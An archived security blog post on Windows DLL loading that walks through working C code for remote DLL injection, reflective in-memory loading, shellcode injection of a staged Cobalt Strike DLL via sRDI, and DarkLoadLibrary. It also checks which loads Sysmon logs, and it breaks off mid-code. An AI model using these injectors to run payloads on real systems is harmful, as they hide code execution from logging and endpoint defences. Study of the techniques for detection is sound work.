Links
Comment on page

Exploring DLL Loads, Links, and Execution

This is an archive post back from 2021, I have since revisited it (TBD) ⚠

Introduction

Right, so, this is a bit of a long one. But I want to go over a few methods of loading DLLs into processes. Then build onto that and look into Reflective DLLs, some SysMon events associated with loading DLLs, and finally DarkLoadLibrary which could be a great alternative to bootstrapping DLLs.
Before we get into loading DLLs, the following statement is from Microsoft, in the What is a DLL article:
For the Windows operating systems, much of the functionality of the operating system is provided by DLL. Additionally, when you run a program on one of these Windows operating systems, much of the functionality of the program may be provided by DLLs. For example, some programs may contain many different modules, and each module of the program is contained and distributed in DLLs.
The use of DLLs helps promote modularization of code, code reuse, efficient memory usage, and reduced disk space. So, the operating system and the programs load faster, run faster, and take less disk space on the computer.
Essentially, a DLL, or a Dynamic-Link Library, are libraries that contain various pieces of data and provide a modular approach to code. When we use a function like LoadLibraryA, we're pulling that from kernel32.dll:
Algorithm Hash Path
--------- ---- ----
SHA256 4AC6099C86B3039356359A7D31026BF056872EBBF8A8E551A1115919E54FB772 C:\Windows\system32\kernel32.dll
Thinking about this offensively, it makes sense that DLLs being loaded into processes could be a great way to execute arbitrary code.

Loading A DLL from Disk

Lets take a look at a programatic way of loading a given DLL into a process when that DLL is on the same disk as the executable.
The DLL that will be used for debugging:
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
break;
case DLL_THREAD_ATTACH:
MessageBoxA(nullptr, "DLL_THREAD_ATTACH", "DLL_THREAD_ATTACH", MB_OK);
break;
case DLL_THREAD_DETACH:
MessageBoxA(nullptr, "DLL_THREAD_DETACH", "DLL_THREAD_DETACH", MB_OK);
break;
case DLL_PROCESS_DETACH:
MessageBoxA(nullptr, "DLL_PROCESS_DETACH", "DLL_PROCESS_DETACH", MB_OK);
break;
}
return TRUE;
}
Depending on the way the DLL is loaded, it will throw a MessageBoxA telling us which method of attachment was used.
This could even be a one-liner:
#include <stdio.h>
#include <windows.h>
int main()
{
LPCSTR path = "..\\Release\\debug-dll.dll";
printf("%p\n", LoadLibraryA(path));
return 0;
}
Running this:
All thats happended here is that LoadLibraryA has been called on our debug-dll.dll from earlier. Here is a quick description on LoadLibraryA:
LoadLibrary can be used to load a library module into the address space of the process and return a handle that can be used in GetProcAddress to get the address of a DLL function. LoadLibrary can also be used to load other executable modules. For example, the function can specify an .exe file to get a handle that can be used in FindResource or LoadResource. However, do not use LoadLibrary to run an .exe file. Instead, use the CreateProcess function.
If we look up the loader in Process Hacker, we can see the DLL has been linked to the Process Execution Block (PEB):
This one is a bit more complicated as it requires us to do a bit of process injection. I discussed DLL Injection in-depth in Process Injection Part 1: The Theory, so I won't go into detail here. But, essentially what is happening in the following code is a sacrificial process is being created with CreateProcessA and then a given DLL is being injected. This just means that we will create a process, then inject the DLL into memory and have it load there.
The code:
void remote_load_dll(LPCSTR path)
{
LPSTARTUPINFOA si = new STARTUPINFOA();
PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
{
printf("[!] Failed to create process!\n");
return;
}
else
{
printf(" :: Process ID: %d\n", pi->dwProcessId);
printf(" :: Process Handle: %p\n", pi->hProcess);
int len = strlen(path);
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
printf(" :: Base Address: %p\n", pAddress);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
printf(" :: THREAD_START_ROUTINE: %p\n", pRoutine);
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
printf(" :: Thread: %p\n", hThread);
if (pi->hProcess)CloseHandle(pi->hProcess);
if (pi->hThread)CloseHandle(pi->hThread);
if (hThread)CloseHandle(hThread);
}
}
Process ID 16684 was created and injected into, loading the MessageBoxA DLL:
The issue we have here is that the DLL is being loaded from disk meaning that, in an offensive scenario, the malicious DLL will have to be written to the targets disk:
int len = strlen(path);
LPVOID pAddress = VirtualAllocEx(pi->hProcess, nullptr, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, (LPVOID)path, len, NULL);
PTHREAD_START_ROUTINE pRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
HANDLE hThread = CreateRemoteThread(pi->hProcess, NULL, 0, pRoutine, pAddress, 0, NULL);
The debug-dll.dll can also be seen in the linked modules:
Lets look at a way of removing the requirement for on-disk DLLs to reduce the chance of being so obvious.

Reflective DLL

This is where Reflective DLLs come into it. Reflective DLLs allow for DLLs to be loaded entirely from memory. A good introduction to Reflective DLLs can be seen in What is Reflective DLL Injection and how can be detected?.
This technique was originally written by Stephen Fewer and the original code can be found in stephenfewer/ReflectiveDLLInjection. The repository provided by Stephen Fewer goes over how this technique works quite well:
  1. 1.
    Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
  2. 2.
    As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
  3. 3.
    The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
  4. 4.
    The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
  5. 5.
    The library's headers and sections are loaded into their new locations in memory.
  6. 6.
    The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
  7. 7.
    The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
  8. 8.
    The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
  9. 9.
    Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
The exported function can be seen on line 49 and will be an indicator that we will look at later on. Additionally, the entirety of the ReflectiveLoader.c is very well commented. So, between the technique explanation, and the code comments, I won't describe everything it is doing.
Lets write something malicious to demonstrate a the Reflective DLL process.
First off, the actual DLL. This is very similar to the debug-dll.dll from earlier, in that it will throw a MessageBoxA. The example that will follow is practically identical to ReflectiveDll.c provided by Stephen Fewer. Here is the code we will be working with:
#include "ReflectiveLoader.h"
#include <windows.h>
extern "C" HINSTANCE hAppInstance;
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
if (lpReserved != NULL)
{
*(HMODULE*)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
MessageBoxA(nullptr, "DLL_PROCESS_ATTACH", "DLL_PROCESS_ATTACH", MB_OK);
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
That is the DLL to be injected, so lets look at writing a tool to load this DLL into the target processes.
The Injector: Reflective Prerequisties
Before writing the actual injection mechanism, some utility functions are needed. I grabbed this via a brute-force/error-based development with the repository provided until I got the minimum functions required, which were these two:
#include <windows.h>
#include <stdio.h>
#define WIN_X64
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef WIN_X64
DWORD dwCompiledArch = 2;
#else
// This will catch Win32 and WinRT.
DWORD dwCompiledArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwCompiledArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwCompiledArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
Again, the code is very well commented. But the two functions:
Rva2Offset:
Convert the Relative Virtual Address (RVA) to an offset which can be used to find the entry-point later on.
GetReflectiveLoaderOffset:
Does what it says on the tin, looks for the Reflective Loaders offset with the Rva2Offset function.
With that done, lets look at getting a DLL into memory. At first, I did it the old xxd way but the DLL came out to be 90,000 bytes which was killing Visual Studio. So, I opted for a method of reading the bytes into an LPVOID which is basically the same format it would be in anyway!
DWORD ReadBytes(char* path, LPVOID* shellcode) {
HANDLE hFile;
DWORD size, readAmount = 0;
hFile = CreateFileA(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
size = GetFileSize(hFile, 0);
*shellcode = malloc(size + 16);
ReadFile(hFile, *shellcode, size, &readAmount, 0);
CloseHandle(hFile);
}
return readAmount;
}
FYI, the dll size from xxd:
unsigned int reflective_debug_dll_dll_len = 93696;
The Injector: Local
For the most part, this is a completely bog-standard injection:
Here is the code:
int main(void)
{
const char* path = "C:\\Users\\mez0\\Desktop\\reflective-dll-blog\\dll-shenanigans\\x64\\Release\\reflective-debug-dll.dll";
LPVOID buf;
DWORD bufSz = ReadBytes((char*)path, &buf);
LPVOID pAddress = nullptr;
BOOL bProtect;
HANDLE hThread;
DWORD lpflOldProtect = 0;
DWORD dwLdrOffset = 0;
pAddress = VirtualAlloc(0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
RtlMoveMemory(pAddress, buf, bufSz);
bProtect = VirtualProtect(pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
dwLdrOffset = GetReflectiveLoaderOffset(buf);
LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
hThread = CreateThread(0, 0, lpStartAddress, 0, 0, 0);
Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
WaitForSingleObject(hThread, INFINITE);
}
Executing this:
There is one difference here, and it is the LPTHREAD_START_ROUTINE. Usually, it is just the base address as provided by VirtualAlloc. But this time it uses the GetReflectiveLoaderOffset function to determine the entry-point for the exported function.
The Injector: Remote
This next piece of code is a combination of the process injection from earlier, and the GetReflectiveLoaderOffset in the previous segment:
void remote_exec(DWORD bufSz, LPVOID buf)
{
LPSTARTUPINFOA si = new STARTUPINFOA();
PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
{
printf("[!] Failed to create process!\n");
return;
}
else
{
printf(" :: Process ID: %d\n", pi->dwProcessId);
printf(" :: Process Handle: %p\n", pi->hProcess);
LPVOID pAddress = nullptr;
BOOL bProtect;
HANDLE hThread;
DWORD lpflOldProtect = 0;
DWORD dwLdrOffset = 0;
pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
dwLdrOffset = GetReflectiveLoaderOffset(buf);
LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
hThread = CreateRemoteThread(pi->hProcess, 0, 0, lpStartAddress, 0, 0, 0);
WaitForSingleObject(hThread, 5000);
if (pi->hProcess)CloseHandle(pi->hProcess);
if (pi->hThread)CloseHandle(pi->hThread);
if (hThread)CloseHandle(hThread);
}
return;
}
Executing this, notepad spawns and is injected into:

Investigating the loads

Now that we've looked at both a standard, and a reflective DLL. Lets inspect the loads. Below is a screenshot of the of the Reflective DLL being loaded from memory and no reflective-debug-dll.dll can be seen in the linked modules:
It makes sense, we're executing a DLL from a bootstrapped entry-point, meaning its not a traditional DLL. Well, does it comply with the expected Kernel Callbacks from the PsSetLoadImageNotifyRoutine function?
First off, startLogging.xml from cyb3rward0g is used as the configuration file for Sysmon. The event ID for this is 7, below is the relevant config segment:
<RuleGroup name="" groupRelation="or">
<!-- Event ID 7 == Image Loaded. Log everything except -->
<ImageLoad onmatch="exclude">
<Image condition="image">chrome.exe</Image>
<Image condition="image">vmtoolsd.exe</Image>
<Image condition="image">Sysmon.exe</Image>
<Image condition="image">mmc.exe</Image>
<Image condition="is">C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Image>
<Image condition="is">C:\Windows\System32\taskeng.exe</Image>
<Image condition="is">C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe</Image>
<Image condition="is">C:\Program Files\Windows Defender\NisSrv.exe</Image>
<Image condition="is">C:\Program Files\Windows Defender\MsMpEng.exe</Image>
<Image condition="end with">onedrivesetup.exe</Image>
<Image condition="end with">onedrive.exe</Image>
<Image condition="end with">skypeapp.exe</Image>
<Image condition="begin with">C:\Packages\Plugins\</Image> <!--Azure ARM Extensions -->
<Image condition="begin with">C:\WindowsAzure\</Image> <!--Azure -->
</ImageLoad>
</RuleGroup>
Generally, Get-WinEvent can be used to query Sysmon:
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational"|where {$_.id -eq 7}
As we know that the on-disk loader loads DLLs as Windows expects, we can use that to verify if Sysmon is working as correctly. The screenshow below shows the on-disk-loader.exe loading debug-dll.dll into the current process (denoted by the 1):
A bunch of Image loaded events are found.
To look up the event in more detail, Event Viewer can be used by going to the follow path:
Applications and Services Logs -> Microsoft -> Windows -> Sysmon -> Operational
Then the events can be seen as such:
Or, here is a dirty little bit of PowerShell:
$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"
$loader = "on-disk-loader.exe"
$dll = "debug-dll.dll"
$Yesterday = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId ;StartTime = $Yesterday;}
$date = Get-Date -Format "yyyy-MM-dd HH"
foreach($event in $events)
{
$msg = $event.Message.ToString()
$image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
$imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
$utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
if($image.contains($loader) -and $imageLoaded.Contains($dll))
{
Write-Host $image loaded $imageLoaded at $utcTime
}
}
This will give something like:
Updating the script for the reflective DLL by changing the $loader to the in-mem-loader PE, and then $dll to reflective-debug-dll.dll:
$eventId = 7
$logName = "Microsoft-Windows-Sysmon/Operational"
$loader = "in-mem-loader.exe"
$dll = "reflective-debug-dll.dll"
$Yesterday = (Get-Date).AddHours(-1)
$events = Get-WinEvent -FilterHashtable @{logname=$logName; id=$eventId ;StartTime = $Yesterday;}
$date = Get-Date -Format "yyyy-MM-dd HH"
foreach($event in $events)
{
$msg = $event.Message.ToString()
$image = ($msg|Select-String -Pattern 'Image:.*').Matches.Value.Replace("Image: ", "")
$imageLoaded = ($msg|Select-String -Pattern 'ImageLoaded:.*').Matches.Value.Replace("ImageLoaded: ", "")
$utcTime = ($msg|Select-String -Pattern 'UtcTime:.*').Matches.Value.Replace("UtcTime: ", "")
if($image.contains($loader) -and $imageLoaded.Contains($dll))
{
Write-Host $image loaded $imageLoaded at $utcTime
}
}
Below is a screenshot of the Reflective DLL being loaded and the script not finding any events:
This makes sense as a DLL is not being loaded the traditional way, but it comes with some OpSec considerations.

x64dbg tangent

First thing I want to look at is the DLL in memory, loading it up in x64dbg and setting a breakpoint on VirtualAlloc, the RBP register shows the PE Magic bytes, MZ. Checking the base address VirtualAlloc returns matches up with the printed statement, and the RBP Register, following this into a dump, the full DOS Header can be seen:
Dumping the memory to disk:
Armed with a memory dump, we can load it up into PE-Bear and see that this is the valid Reflective DLL:
To sanity check myself, I compared the in-mem-loader to the dumped file to make sure I didn't do anything weird:
Tracking down the ReflectiveLoader export is easy enough in ReflectiveLoader.c:
DLLEXPORT ULONG_PTR WINAPI REFLDR_NAME( VOID )
Where REFLDR_NAME is:
#define REFLDR_NAME ReflectiveLoader
Bit of a tangent, but cool nonetheless.

An Improved Reflective DLL

Something I wanted to quickly bring to light was an improved version of the Reflective DLL that was released by Dan Staples in An Improved Reflective DLL Injection Technique in 2015. Below is a quote from the blog which describes the main improvements made:
It does this by dynamically writing some bootstrap shellcode to the target process which loads the DLL (using LoadLibraryA) and then finds and calls another exported entry point function (using GetProcAddress). While this is a great improvement to traditional DLL injection, it is not reflective.
The new code can be found in dismantl/ImprovedReflectiveDLLInjection.
The article does a great job of detailing the improvements, so I won't repeat it here, but I just wanted to address those improvements have been made on this technique since it was initially identified.

Shellcode Reflective DLL Injection

Everything achieved so far has required access to the source code to compile the reflective loader component into it. To achieve that, a project called sRDI exists. sRDI – Shellcode Reflective DLL Injection was written to support the project and goes into detail on how the project works. But, essentially, it is this:
To quote the blog directly:
When execution starts at the top of the bootstrap, the general flow looks like this:
  1. 1.
    Get current location in memory (Bootstrap)
  2. 2.
    Calculate and setup registers (Bootstrap)
  3. 3.
    Pass execution to RDI with the function hash, user data, and location of the target DLL (Bootstrap)
  4. 4.
    Un-pack DLL and remap sections (RDI)
  5. 5.
    Call DLLMain (RDI)
  6. 6.
    Call exported function by hashed name (RDI) – Optional
  7. 7.
    Pass user-data to exported function (RDI) – Optional
As my DLL is huge, I'll use a Staged Cobalt Strike DLL. Below is the sRDI usage:
usage: ConvertToShellcode.py [-h] [-v] [-f FUNCTION_NAME] [-u USER_DATA] [-c] [-i] [-d IMPORT_DELAY] input_dll
RDI Shellcode Converter
positional arguments:
input_dll DLL to convert to shellcode
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-f FUNCTION_NAME, --function-name FUNCTION_NAME
The function to call after DllMain
-u USER_DATA, --user-data USER_DATA
Data to pass to the target function
-c, --clear-header Clear the PE header on load
-i, --obfuscate-imports
Randomize import dependency load order
-d IMPORT_DELAY, --import-delay IMPORT_DELAY
Number of seconds to pause between loading imports
There are some really cool pieces of functionaliy here, so I recommend taking a look through ShellcodeRDI.py, but thats not in scope for now.
The Cobalt Strike DLL Entry is Start, and that can be verified by running something like this:
Running sRDI and specifying Start as the FUNCTION_NAME:
This can now be loaded into the injector as shown earlier. Again, for the sake of not crashing my Visual Studio, I'll just read the bytes into memory, as opposed to storing 20,000 bytes:
const char* path = "G:\\Dropbox\\artifact.bin";
LPVOID buf;
DWORD bufSz = ReadBytes((char*)path, &buf);
Because sRDI provides a bootstrap, none of the GetReflectiveLoaderOffset stuff is needed. Below is the injection code:
void remote_exec(DWORD bufSz, LPVOID buf)
{
LPSTARTUPINFOA si = new STARTUPINFOA();
PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
if (CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi) == NULL)
{
printf("[!] Failed to create process!\n");
return;
}
else
{
printf(" :: Process ID: %d\n", pi->dwProcessId);
printf(" :: Process Handle: %p\n", pi->hProcess);
LPVOID pAddress = nullptr;
BOOL bProtect;
HANDLE hThread;
DWORD lpflOldProtect = 0;
DWORD dwLdrOffset = 0;
pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf(" :: Base Address: %p\n", pAddress);
WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
printf(" :: Bytes Written!\n");
bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
printf(" :: Set PAGE_EXECUTE_READ\n");
//dwLdrOffset = GetReflectiveLoaderOffset(buf);
//printf(" :: Loader Offset: %zd\n", dwLdrOffset);
//LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
//printf(" :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);
hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
printf(" :: Thread: %p\n", hThread);
WaitForSingleObject(hThread, 5000);
if (pi->hProcess)CloseHandle(pi->hProcess);
if (pi->hThread)CloseHandle(pi->hThread);
if (hThread)CloseHandle(hThread);
}
return;
}
Note the commented out code:
//dwLdrOffset = GetReflectiveLoaderOffset(buf);
//printf(" :: Loader Offset: %zd\n", dwLdrOffset);
//LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
//printf(" :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);
And the thread is created normally:
hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
Running this code shows notepad.exe being injected into and the DLL being executed:
Similarly to the Reflective DLL, no linked DLL is shown:

Recap

A few tangents later, what has actually occurred. So far:
  1. 1.
    Looked at loading DLLs from disk and the associated kernel-callback (PsSetLoadImageNotifyRoutine), as well as the DLLs being linked to the PEB.
  2. 2.
    Poked around some Reflective DLLs
  3. 3.
    Looked at sRDI and created a little POC.
Moving on!

DarkLoadLibrary

A few weeks ago, batsec posted an excellent blog called Bypassing Image Load Kernel Callbacks on behalf of MDSec. This project looked at the kernel-callbacks associated with loading modules and linking them to the PEB.
What makes this interesting is the following table from the blog:
As long as I haven't misunderstood the library, this only works within the current process and doesn't support any kind of remote process interactions right out of the box, which is fine. We will work with that. According to the table, however, there's probably not any reason to avoid it, it does it all! Batsec goes on to discuss how this library is essentially the end product of rewriting the Windows library loader from scratch, so kudos to him.

A Quick Test

Below is the example provided:
#include <stdio.h>
#include <windows.h>
#include "pebutils.h"
#include "darkloadlibrary.h"
typedef DWORD (WINAPI * _ThisIsAFunction) (LPCWSTR);
VOID main()
{
GETPROCESSHEAP pGetProcessHeap = (GETPROCESSHEAP)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "GetProcessHeap");
HEAPFREE pHeapFree = (HEAPFREE)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "HeapFree");
PDARKMODULE DarkModule = DarkLoadLibrary(
LOAD_LOCAL_FILE,
L"TestDLL.dll",
NULL,
0,
NULL
);
if (!DarkModule->bSuccess)
{
printf("load failed: %S\n", DarkModule->ErrorMsg);
pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg);
pHeapFree(pGetProcessHeap(), 0, DarkModule);
return;
}
_ThisIsAFunction ThisIsAFunction = (_ThisIsAFunction)GetFunctionAddress(
(HMODULE)DarkModule->ModuleBase,
"CallThisFunction"
);
pHeapFree(pGetProcessHeap(), 0, DarkModule);
if (!ThisIsAFunction)
{
printf("failed to find it\n");
return;
}
ThisIsAFunction(L"this is working!!!");
return;
}
It loads TestDLL.dll and calls ThisIsAFunction. Simples.
Some messing about later, I ended up with a small PE that uses both the load options. First off though, the in memory replicator (read it from a file and store in a buffer):
DWORD read_bytes_from_file(LPCWSTR path, LPVOID* buf)
{
HANDLE hFile;
DWORD size, readAmount = 0;
hFile = CreateFileW(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
size = GetFileSize(hFile, 0);
*buf = malloc(size + 16);
BOOL bRead = ReadFile(hFile, *buf, size, &readAmount, 0);
if (bRead == FALSE)
{
readAmount = 0;
}
CloseHandle(hFile);
}
return readAmount;
}
A standard wmain:
int wmain(int argc, wchar_t* argv[])
{
LPCWSTR path;
int mode = 0;
if (argc == 3)
{
mode = atoi(argv